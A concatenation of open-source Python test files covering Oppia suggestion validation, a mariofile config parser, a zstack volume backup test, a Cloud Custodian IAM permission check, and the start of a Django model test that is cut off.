suggestion_registry.ExplorationVoiceoverApplication(
'application_id', 'exp_id', suggestion_models.STATUS_IN_REVIEW,
self.author_id, None, 'en', 'audio_file.mp3', '<p>Content</p>',
None))
def test_validation_with_invalid_target_type_raise_exception(self):
self.voiceover_application.validate()
self.voiceover_application.target_type = 'invalid_target'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected target_type to be among allowed choices, '
'received invalid_target'
):
self.voiceover_application.validate()
def test_validation_with_invalid_target_id_raise_exception(self):
self.voiceover_application.validate()
self.voiceover_application.target_id = 123
with self.assertRaisesRegex(
utils.ValidationError, 'Expected target_id to be a string'
):
self.voiceover_application.validate()
def test_validation_with_invalid_status_raise_exception(self):
self.voiceover_application.validate()
self.voiceover_application.status = 'invalid_status'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected status to be among allowed choices, '
'received invalid_status'
):
self.voiceover_application.validate()
def test_validation_with_invalid_author_id_raise_exception(self):
self.voiceover_application.validate()
self.voiceover_application.author_id = 123
with self.assertRaisesRegex(
utils.ValidationError, 'Expected author_id to be a string'
):
self.voiceover_application.validate()
def test_validation_with_invalid_final_reviewer_id_raise_exception(self):
self.assertEqual(
self.voiceover_application.status,
suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(self.voiceover_application.final_reviewer_id, None)
self.voiceover_application.validate()
self.voiceover_application.final_reviewer_id = 123
with self.assertRaisesRegex(
utils.ValidationError,
'Expected final_reviewer_id to be None as the '
'voiceover application is not yet handled.'
):
self.voiceover_application.validate()
def test_validation_for_handled_application_with_invalid_final_review(self):
self.assertEqual(
self.voiceover_application.status,
suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(self.voiceover_application.final_reviewer_id, None)
self.voiceover_application.validate()
self.voiceover_application.status = suggestion_models.STATUS_ACCEPTED
with self.assertRaisesRegex(
utils.ValidationError, 'Expected final_reviewer_id to be a string'
):
self.voiceover_application.validate()
def test_validation_for_rejected_application_with_no_message(self):
self.assertEqual(
self.voiceover_application.status,
suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(self.voiceover_application.rejection_message, None)
self.voiceover_application.validate()
self.voiceover_application.final_reviewer_id = 'reviewer_id'
self.voiceover_application.status = suggestion_models.STATUS_REJECTED
with self.assertRaisesRegex(
utils.ValidationError,
'Expected rejection_message to be a string for a '
'rejected application'
):
self.voiceover_application.validate()
def test_validation_for_accepted_application_with_message(self):
self.assertEqual(
self.voiceover_application.status,
suggestion_models.STATUS_IN_REVIEW)
self.assertEqual(self.voiceover_application.rejection_message, None)
self.voiceover_application.validate()
self.voiceover_application.final_reviewer_id = 'reviewer_id'
self.voiceover_application.status = suggestion_models.STATUS_ACCEPTED
self.voiceover_application.rejection_message = 'Invalid message'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected rejection_message to be None for the accepted '
'voiceover application, received Invalid message'
):
self.voiceover_application.validate()
def test_validation_with_invalid_language_code_type_raise_exception(self):
self.assertEqual(self.voiceover_application.language_code, 'en')
self.voiceover_application.validate()
self.voiceover_application.language_code = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected language_code to be a string'
):
self.voiceover_application.validate()
def test_validation_with_invalid_language_code_raise_exception(self):
self.assertEqual(self.voiceover_application.language_code, 'en')
self.voiceover_application.validate()
self.voiceover_application.language_code = 'invalid language'
with self.assertRaisesRegex(
utils.ValidationError, 'Invalid language_code: invalid language'
):
self.voiceover_application.validate()
def test_validation_with_invalid_filename_type_raise_exception(self):
self.assertEqual(self.voiceover_application.filename, 'audio_file.mp3')
self.voiceover_application.validate()
self.voiceover_application.filename = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected filename to be a string'
):
self.voiceover_application.validate()
def test_validation_with_invalid_content_type_raise_exception(self):
self.assertEqual(self.voiceover_application.content, '<p>Content</p>')
self.voiceover_application.validate()
self.voiceover_application.content = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected content to be a string'
):
self.voiceover_application.validate()
def test_to_dict_returns_correct_dict(self):
self.voiceover_application.accept(self.reviewer_id)
expected_dict = {
'voiceover_application_id': 'application_id',
'target_type': 'exploration',
'target_id': 'exp_id',
'status': 'accepted',
'author_name': 'author',
'final_reviewer_name': 'reviewer',
'language_code': 'en',
'content': '<p>Content</p>',
'filename': 'audio_file.mp3',
'rejection_message': None
}
self.assertEqual(
self.voiceover_application.to_dict(), expected_dict)
def test_is_handled_property_returns_correct_value(self):
self.assertFalse(self.voiceover_application.is_handled)
self.voiceover_application.accept(self.reviewer_id)
self.assertTrue(self.voiceover_application.is_handled)
def test_accept_voiceover_application(self):
self.assertEqual(self.voiceover_application.final_reviewer_id, None)
self.assertEqual(self.voiceover_application.status, 'review')
self.voiceover_application.accept(self.reviewer_id)
self.assertEqual(
self.voiceover_application.final_reviewer_id, self.reviewer_id)
self.assertEqual(self.voiceover_application.status, 'accepted')
def test_reject_voiceover_application(self):
self.assertEqual(self.voiceover_application.final_reviewer_id, None)
self.assertEqual(self.voiceover_application.status, 'review')
self.voiceover_application.reject(self.reviewer_id, 'rejection message')
self.assertEqual(
self.voiceover_application.final_reviewer_id, self.reviewer_id)
self.assertEqual(self.voiceover_application.status, 'rejected')
self.assertEqual(
self.voiceover_application.rejection_message, 'rejection message')
class CommunityContributionStatsUnitTests(test_utils.GenericTestBase):
"""Tests for the CommunityContributionStats class."""
translation_reviewer_counts_by_lang_code = {
'hi': 0,
'en': 1
}
translation_suggestion_counts_by_lang_code = {
'fr': 6,
'en': 5
}
question_reviewer_count = 1
question_suggestion_count = 4
negative_count = -1
non_integer_count = 'non_integer_count'
sample_language_code = 'en'
invalid_language_code = 'invalid'
def _assert_community_contribution_stats_is_in_default_state(self):
"""Checks if the community contribution stats is in its default
state.
"""
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self.assertEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
), {})
self.assertEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
), {})
self.assertEqual(
community_contribution_stats.question_reviewer_count, 0)
self.assertEqual(
community_contribution_stats.question_suggestion_count, 0)
def test_initial_object_with_valid_arguments_has_correct_properties(self):
community_contribution_stats = (
suggestion_registry.CommunityContributionStats(
self.translation_reviewer_counts_by_lang_code,
self.translation_suggestion_counts_by_lang_code,
self.question_reviewer_count,
self.question_suggestion_count
)
)
community_contribution_stats.validate()
self.assertEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
),
self.translation_reviewer_counts_by_lang_code)
self.assertEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
),
self.translation_suggestion_counts_by_lang_code
)
self.assertEqual(
community_contribution_stats.question_reviewer_count,
self.question_reviewer_count
)
self.assertEqual(
community_contribution_stats.question_suggestion_count,
self.question_suggestion_count
)
def test_set_translation_reviewer_count_for_lang_code_updates_empty_dict(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
),
{self.sample_language_code: 2}
)
def test_set_translation_reviewer_count_for_lang_code_updates_count_value(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
) = {self.sample_language_code: 1}
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
),
{self.sample_language_code: 2}
)
def test_set_translation_reviewer_count_for_lang_code_adds_new_lang_key(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
) = {'en': 1}
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code('hi', 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_reviewer_counts_by_lang_code
),
{'en': 1, 'hi': 2}
)
def test_set_translation_suggestion_count_for_lang_code_updates_empty_dict(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
), {self.sample_language_code: 2}
)
def test_set_translation_suggestion_count_for_lang_code_updates_count_value(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
) = {self.sample_language_code: 1}
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
),
{self.sample_language_code: 2}
)
def test_set_translation_suggestion_count_for_lang_code_adds_new_lang_key(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
self._assert_community_contribution_stats_is_in_default_state()
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
) = {'en': 1}
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code('hi', 2)
)
self.assertDictEqual(
(
community_contribution_stats
.translation_suggestion_counts_by_lang_code
),
{'en': 1, 'hi': 2}
)
def test_get_translation_language_codes_that_need_reviewers_for_one_lang(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 1)
language_codes_that_need_reviewers = (
stats.get_translation_language_codes_that_need_reviewers()
)
self.assertEqual(
language_codes_that_need_reviewers, {self.sample_language_code})
def test_get_translation_language_codes_that_need_reviewers_for_multi_lang(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code('hi', 1)
stats.set_translation_suggestion_count_for_language_code('fr', 1)
language_codes_that_need_reviewers = (
stats.get_translation_language_codes_that_need_reviewers()
)
self.assertEqual(
language_codes_that_need_reviewers, {'hi', 'fr'})
def test_get_translation_language_codes_that_need_reviewers_for_no_lang(
self):
stats = suggestion_services.get_community_contribution_stats()
language_codes_that_need_reviewers = (
stats.get_translation_language_codes_that_need_reviewers()
)
self.assertEqual(
language_codes_that_need_reviewers, set())
def test_translation_reviewers_are_needed_if_suggestions_but_no_reviewers(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 1)
self.assertTrue(
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
def test_translation_reviewers_are_needed_if_num_suggestions_past_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 2)
stats.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 1)
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = (
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
self.assertTrue(reviewers_are_needed)
def test_translation_reviewers_not_needed_if_num_suggestions_eqs_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 2)
stats.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 2)
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = (
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
self.assertFalse(reviewers_are_needed)
def test_translation_reviewers_not_needed_if_num_suggestions_less_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_suggestion_count_for_language_code(
self.sample_language_code, 1)
stats.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 2)
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = (
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
self.assertFalse(reviewers_are_needed)
    def test_translation_reviewers_not_needed_if_reviewers_and_no_suggestions(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.set_translation_reviewer_count_for_language_code(
self.sample_language_code, 1)
self.assertFalse(
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
    def test_translation_reviewers_not_needed_if_no_reviewers_no_suggestions(
self):
stats = suggestion_services.get_community_contribution_stats()
self._assert_community_contribution_stats_is_in_default_state()
self.assertFalse(
stats.are_translation_reviewers_needed_for_lang_code(
self.sample_language_code))
def test_question_reviewers_are_needed_if_suggestions_zero_reviewers(
self):
stats = suggestion_services.get_community_contribution_stats()
stats.question_suggestion_count = 1
self.assertTrue(stats.are_question_reviewers_needed())
def test_question_reviewers_are_needed_if_num_suggestions_past_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.question_suggestion_count = 2
stats.question_reviewer_count = 1
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = stats.are_question_reviewers_needed()
self.assertTrue(reviewers_are_needed)
def test_question_reviewers_not_needed_if_num_suggestions_eqs_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.question_suggestion_count = 2
stats.question_reviewer_count = 2
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = stats.are_question_reviewers_needed()
self.assertFalse(reviewers_are_needed)
def test_question_reviewers_not_needed_if_num_suggestions_less_max(self):
stats = suggestion_services.get_community_contribution_stats()
stats.question_suggestion_count = 1
stats.question_reviewer_count = 2
config_services.set_property(
'committer_id', 'max_number_of_suggestions_per_reviewer', 1)
reviewers_are_needed = stats.are_question_reviewers_needed()
self.assertFalse(reviewers_are_needed)
    def test_question_reviewers_not_needed_if_no_reviewers_no_suggestions(
self):
stats = suggestion_services.get_community_contribution_stats()
self._assert_community_contribution_stats_is_in_default_state()
self.assertFalse(stats.are_question_reviewers_needed())
def test_validate_translation_reviewer_counts_fails_for_negative_counts(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.sample_language_code, self.negative_count)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the translation reviewer count to be non-negative for '
'%s language code, received: %s.' % (
self.sample_language_code, self.negative_count)
):
community_contribution_stats.validate()
def test_validate_translation_suggestion_counts_fails_for_negative_counts(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.sample_language_code, self.negative_count)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the translation suggestion count to be non-negative for '
'%s language code, received: %s.' % (
self.sample_language_code, self.negative_count)
):
community_contribution_stats.validate()
def test_validate_question_reviewer_count_fails_for_negative_count(self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
community_contribution_stats.question_reviewer_count = (
self.negative_count
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the question reviewer count to be non-negative, '
'received: %s.' % (
community_contribution_stats.question_reviewer_count)
):
community_contribution_stats.validate()
def test_validate_question_suggestion_count_fails_for_negative_count(self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
community_contribution_stats.question_suggestion_count = (
self.negative_count
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the question suggestion count to be non-negative, '
'received: %s.' % (
community_contribution_stats.question_suggestion_count)
):
community_contribution_stats.validate()
def test_validate_translation_reviewer_counts_fails_for_non_integer_counts(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.sample_language_code, self.non_integer_count)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the translation reviewer count to be an integer for '
'%s language code, received: %s.' % (
self.sample_language_code, self.non_integer_count)
):
community_contribution_stats.validate()
def test_validate_translation_suggestion_counts_fails_for_non_integer_count(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.sample_language_code, self.non_integer_count)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the translation suggestion count to be an integer for '
'%s language code, received: %s.' % (
self.sample_language_code, self.non_integer_count)
):
community_contribution_stats.validate()
def test_validate_question_reviewer_count_fails_for_non_integer_count(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
community_contribution_stats.question_reviewer_count = (
self.non_integer_count
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the question reviewer count to be an integer, '
'received: %s.' % (
community_contribution_stats.question_reviewer_count)
):
community_contribution_stats.validate()
def test_validate_question_suggestion_count_fails_for_non_integer_count(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
community_contribution_stats.question_suggestion_count = (
self.non_integer_count
)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the question suggestion count to be an integer, '
'received: %s.' % (
community_contribution_stats.question_suggestion_count)
):
community_contribution_stats.validate()
def test_validate_translation_reviewer_counts_fails_for_invalid_lang_code(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_reviewer_count_for_language_code(
self.invalid_language_code, 1)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Invalid language code for the translation reviewer counts: '
'%s.' % self.invalid_language_code
):
community_contribution_stats.validate()
def test_validate_translation_suggestion_counts_fails_for_invalid_lang_code(
self):
community_contribution_stats = (
suggestion_services.get_community_contribution_stats()
)
(
community_contribution_stats
.set_translation_suggestion_count_for_language_code(
self.invalid_language_code, 1)
)
with self.assertRaisesRegex(
utils.ValidationError,
'Invalid language code for the translation suggestion counts: '
'%s.' % self.invalid_language_code
):
community_contribution_stats.validate()
class ReviewableSuggestionEmailInfoUnitTests(test_utils.GenericTestBase):
"""Tests for the ReviewableSuggestionEmailInfo class."""
suggestion_type = feconf.SUGGESTION_TYPE_ADD_QUESTION
language_code = 'en'
suggestion_content = 'sample question'
submission_datetime = datetime.datetime.utcnow()
def test_initial_object_with_valid_arguments_has_correct_properties(self):
reviewable_suggestion_email_info = (
suggestion_registry.ReviewableSuggestionEmailInfo(
self.suggestion_type, self.language_code,
self.suggestion_content, self.submission_datetime
)
)
self.assertEqual(
reviewable_suggestion_email_info.suggestion_type,
self.suggestion_type)
self.assertEqual(
reviewable_suggestion_email_info.language_code,
self.language_code)
self.assertEqual(
reviewable_suggestion_email_info.suggestion_content,
self.suggestion_content)
self.assertEqual(
reviewable_suggestion_email_info.submission_datetime,
self.submission_datetime)
| oppia/oppia | core/domain/suggestion_registry_test.py | Python | apache-2.0 | 148,457 |
# -*- coding: utf-8 -*-
# python 2 support via python-future
from __future__ import absolute_import, division, print_function, unicode_literals
from builtins import dict
import os
import pytest
from mariobros import mariofile
SIMPLE_MARIOFILE = """[section_one]
text one
[section_two]
text two
"""
COMPLEX_MARIOFILE = """default text
[section] \ntext section
"""
GARBAGE_MARIOFILE = """default
[garbage_section] # garbage
"""
INVALID_SECTION_MARIOFILE = """
# spaces not allowed in section name
[section one]
"""
MORE_COMPLEX_MARIOFILE = """# default
[section_one]
text one
# comment
text two # inline comment
[section_two]
text three
[three]
[DEFAULT]
last"""
def test_parse_sections():
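    # parse_sections() yields (section_name, section_lines) pairs; lines before
    # the first [section] header are collected under 'DEFAULT' and malformed
    # section headers raise ConfigurationFileError.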
simple_mariofile_sections = dict(mariofile.parse_sections(SIMPLE_MARIOFILE.splitlines(True)))
assert len(simple_mariofile_sections) == 3
complex_mariofile_sections = dict(mariofile.parse_sections(COMPLEX_MARIOFILE.splitlines(True)))
assert len(complex_mariofile_sections) == 2
assert sorted(complex_mariofile_sections.keys()) == ['DEFAULT', 'section']
assert complex_mariofile_sections['DEFAULT'] == ['default text\n', '\n']
with pytest.raises(mariofile.ConfigurationFileError):
dict(mariofile.parse_sections(GARBAGE_MARIOFILE.splitlines(True)))
with pytest.raises(mariofile.ConfigurationFileError):
dict(mariofile.parse_sections(INVALID_SECTION_MARIOFILE.splitlines(True)))
more_complex_mariofile_sections = dict(
mariofile.parse_sections(MORE_COMPLEX_MARIOFILE.splitlines(True))
)
more_complex_mariofile_sections_keys = ['DEFAULT', 'section_one', 'section_two', 'three']
assert sorted(more_complex_mariofile_sections.keys()) == more_complex_mariofile_sections_keys
assert more_complex_mariofile_sections['three'] == []
CRASH_MARIOFILE_1 = '''
[a]
name
target:
a = 1
'''
CRASH_MARIOFILE_2 = '''
[a]
name
variable = 1
'''
def test_statements():
with pytest.raises(mariofile.ConfigurationFileError):
mariofile.parse_section_body(CRASH_MARIOFILE_1.splitlines())
with pytest.raises(mariofile.ConfigurationFileError):
mariofile.parse_section_body(CRASH_MARIOFILE_2.splitlines())
STRING_PARSE_STATEMENTS = '''
# commento
statement
statement con commento #commento
# altro commento
'''
def test_parse_statements():
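    # Comment-only lines and blank lines are dropped and inline comments are
    # stripped, leaving only the bare statements.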
parsed_statement = mariofile.parse_statements(STRING_PARSE_STATEMENTS.splitlines())
assert '\n'.join(parsed_statement) == "statement\nstatement con commento"
SECTION = """
variable = 6
target: source
task
"""
SECTION_MULTIPLE_RULE = """
target1: source1
task1
target2: source2
task2
"""
INVALID_CONFIG = """
not a definition
target: source
"""
def test_parse_section_body():
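    # A section body reduces to variable definitions plus a single rule
    # (target pattern, sources and action template); multiple rules or
    # unrecognized lines raise ConfigurationFileError.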
output_section = {
'action_template': ' task',
'sources_repls': 'source',
'variable': '6',
'target_pattern': 'target',
}
assert mariofile.parse_section_body(SECTION.splitlines(True)) == output_section
with pytest.raises(mariofile.ConfigurationFileError):
mariofile.parse_section_body(SECTION_MULTIPLE_RULE.splitlines(True))
with pytest.raises(mariofile.ConfigurationFileError):
mariofile.parse_section_body(INVALID_CONFIG.splitlines(True))
INCLUDE_FILE = """
include prova.ini\t
include\taltrofile.ini
variable_definition = None
[first_section]
"""
INCLUDE_UNIQUE_FILE = "include prova.ini"
def test_parse_include():
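    # parse_include() returns the list of included file paths and the number
    # of leading lines it consumed.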
filepaths, current_line = mariofile.parse_include(INCLUDE_FILE.splitlines(True))
assert filepaths == ['prova.ini', 'altrofile.ini']
assert current_line == 4
filepaths, current_line = mariofile.parse_include(INCLUDE_UNIQUE_FILE.splitlines(True))
assert filepaths == ['prova.ini']
assert current_line == 1
MARIOFILE = """[DEFAULT]
variable = 1
[section_one]
target1: source1
task1
"""
MARIOFILE_AND_INCLUDE = """
include test_parse_config.ini
[section_include_1]
"""
MARIOFILE_INCLUDE = """
task_cmd = task_command
[section_include]
variable_include_2 = 0
target_include: source_include
\t${task_cmd}
[section_include_1]
variable_include_3 = 3
"""
TOUCH_MARIOFILE = """
DEFAULT:
touch
[task]
target: source
task
"""
TEST_PARSE_CONFIG = """
include test_include.ini
variable_default = 1
[section_main]
[section_include_1]
variable_include1 = 3
"""
def test_parse_config(tmpdir):
parsed_mariofile = {
'DEFAULT': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'variable': '1'
},
'section_one': {
'action_template': ' task1',
'sources_repls': 'source1',
'target_pattern': 'target1'}
}
    assert mariofile.parse_config(MARIOFILE.splitlines(True)) == parsed_mariofile
parsed_mariofile_include_test = {
'DEFAULT': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'task_cmd': 'task_command',
},
'section_include': {
'variable_include_2': '0',
'action_template': '\t${task_cmd}',
'target_pattern': 'target_include',
'sources_repls': 'source_include',
},
'section_include_1': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'variable_include_3': '3',
}
}
mario_folder = tmpdir.mkdir('tmpdir')
f = mario_folder.join('test_parse_config.ini')
f.write(MARIOFILE_INCLUDE)
g = mario_folder.join('test_include.ini')
g.write('')
mario_folder.chdir()
parsed_mariofile_include = mariofile.parse_config(
MARIOFILE_AND_INCLUDE.splitlines(True),
cwd=os.path.join(str(mario_folder.dirname), 'tmpdir')
)
for key, value in parsed_mariofile_include.items():
        assert value == parsed_mariofile_include_test[key], key
parsed_mariofile_multiple_include = {
'DEFAULT': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'variable_default': '1',
},
'section_main': {
'action_template': u'',
'sources_repls': u'',
'target_pattern': u''
},
'section_include_1': {
'action_template': '',
'sources_repls': '',
'target_pattern': '',
'variable_include1': '3',
}
}
h = mario_folder.join('test_parse_config.ini')
h.write(TEST_PARSE_CONFIG)
    parsed_mariofile_include = mariofile.parse_config(
        MARIOFILE_AND_INCLUDE.splitlines(True),
        cwd=os.path.join(str(mario_folder.dirname), 'tmpdir')
    )
assert parsed_mariofile_include == parsed_mariofile_multiple_include
| bopen/mariobros | tests/test_mariofile.py | Python | apache-2.0 | 6,933 |
# -*- coding:utf-8 -*-
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
volume = test_lib.lib_get_specific_stub('e2e_mini/volume', 'volume')
volume_ops = None
vm_ops = None
volume_name = 'volume-' + volume.get_time_postfix()
backup_name = 'backup-' + volume.get_time_postfix()
def test():
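    # Scenario: create a VM and a data volume, attach the volume to the VM,
    # back up the volume, stop the VM, restore the volume from the backup,
    # delete the backup and finally check the browser console log for errors.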
    global volume_ops, vm_ops
volume_ops = volume.VOLUME()
vm = test_lib.lib_get_specific_stub(suite_name='e2e_mini/vm', specific_name='vm')
vm_ops = vm.VM(uri=volume_ops.uri, initialized=True)
vm_ops.create_vm()
volume_ops.create_volume(volume_name)
volume_ops.volume_attach_to_vm(vm_ops.vm_name)
volume_ops.create_backup(volume_name, 'volume', backup_name)
vm_ops.vm_ops(vm_ops.vm_name, action='stop')
volume_ops.restore_backup(volume_name, 'volume', backup_name)
volume_ops.delete_backup(volume_name, 'volume', backup_name)
volume_ops.check_browser_console_log()
test_util.test_pass('Test Volume Create, Restore and Delete Backups Successful')
def env_recover():
global volume_ops
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
# Will be called only if an exception happens in test().
def error_cleanup():
global volume_ops
try:
vm_ops.expunge_vm()
volume_ops.expunge_volume(volume_name)
volume_ops.close()
except:
pass
| zstackio/zstack-woodpecker | integrationtest/vm/e2e_mini/volume/test_volume_backup.py | Python | apache-2.0 | 1,389 |
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .common import BaseTest, load_data
from c7n.config import Config, Bag
from c7n import manager
import fnmatch
class TestIamGen(BaseTest):
def check_permissions(self, perm_db, perm_set, path):
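        """Check that every 'service:action' permission exists in perm_db.

        Wildcard actions are matched with fnmatch. Returns an empty list when
        all permissions are known, otherwise a single (path, invalid) tuple
        listing the unknown permissions.
        """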
invalid = []
for p in perm_set:
if ':' not in p:
invalid.append(p)
continue
s, a = p.split(':', 1)
if s not in perm_db:
invalid.append(p)
continue
if '*' in a:
if not fnmatch.filter(perm_db[s], a):
invalid.append(p)
continue
elif a not in perm_db[s]:
invalid.append(p)
if not invalid:
return []
return [(path, invalid)]
def test_iam_permissions_validity(self):
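        # Walk every registered AWS resource manager together with its actions
        # and filters, and verify that the IAM permissions they declare exist
        # in the iam-actions.json database.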
cfg = Config.empty()
missing = set()
all_invalid = []
perms = load_data('iam-actions.json')
for k, v in manager.resources.items():
p = Bag({'name': 'permcheck', 'resource': k, 'provider_name': 'aws'})
ctx = self.get_context(config=cfg, policy=p)
mgr = v(ctx, p)
invalid = []
# if getattr(mgr, 'permissions', None):
# print(mgr)
found = False
for s in (mgr.resource_type.service,
getattr(mgr.resource_type, 'permission_prefix', None)):
if s in perms:
found = True
if not found:
missing.add("%s->%s" % (k, mgr.resource_type.service))
continue
invalid.extend(self.check_permissions(perms, mgr.get_permissions(), k))
for n, a in v.action_registry.items():
p['actions'] = [n]
invalid.extend(
self.check_permissions(
perms, a({}, mgr).get_permissions(),
"{k}.actions.{n}".format(k=k, n=n)))
for n, f in v.filter_registry.items():
if n in ('or', 'and', 'not', 'missing'):
continue
p['filters'] = [n]
invalid.extend(
self.check_permissions(
perms, f({}, mgr).get_permissions(),
"{k}.filters.{n}".format(k=k, n=n)))
if invalid:
for k, perm_set in invalid:
perm_set = [i for i in perm_set
if not i.startswith('elasticloadbalancing')]
if perm_set:
all_invalid.append((k, perm_set))
if missing:
raise ValueError(
"resources missing service %s" % ('\n'.join(sorted(missing))))
if all_invalid:
raise ValueError(
"invalid permissions \n %s" % ('\n'.join(sorted(map(str, all_invalid)))))
| kapilt/cloud-custodian | tests/test_iamgen.py | Python | apache-2.0 | 3,515 |
# -*- coding: utf-8 -*-
import copy
import os
from django.contrib import auth
from django.contrib.auth.models import User
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db.models import QuerySet
from django.test import TestCase, Client, mock
from django.urls import reverse
from ..forms import AddBookForm
from ..models import (TheUser, Category, Author, Language, Book,
AddedBook, BookRating, BookComment, Post, SupportMessage, BookRelatedData)
from .utils import Utils
TEST_DIR = os.path.dirname(os.path.abspath(__file__))
TEST_DATA_DIR = os.path.join(TEST_DIR, 'fixtures')
# ----------------------------------------------------------------------------------------------------------------------
class ModelTest(TestCase):
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setUpTestData(cls):
cls.setup_users()
cls.setup_categories()
cls.setup_authors()
cls.setup_languages()
cls.setup_books()
cls.setup_added_books()
cls.setup_book_rating()
cls.setup_book_comment()
cls.setup_post_messages()
cls.setup_support_messages()
# ------------------------------------------------------------------------------------------------------------------
@classmethod
def setup_users(cls):
client = Client()
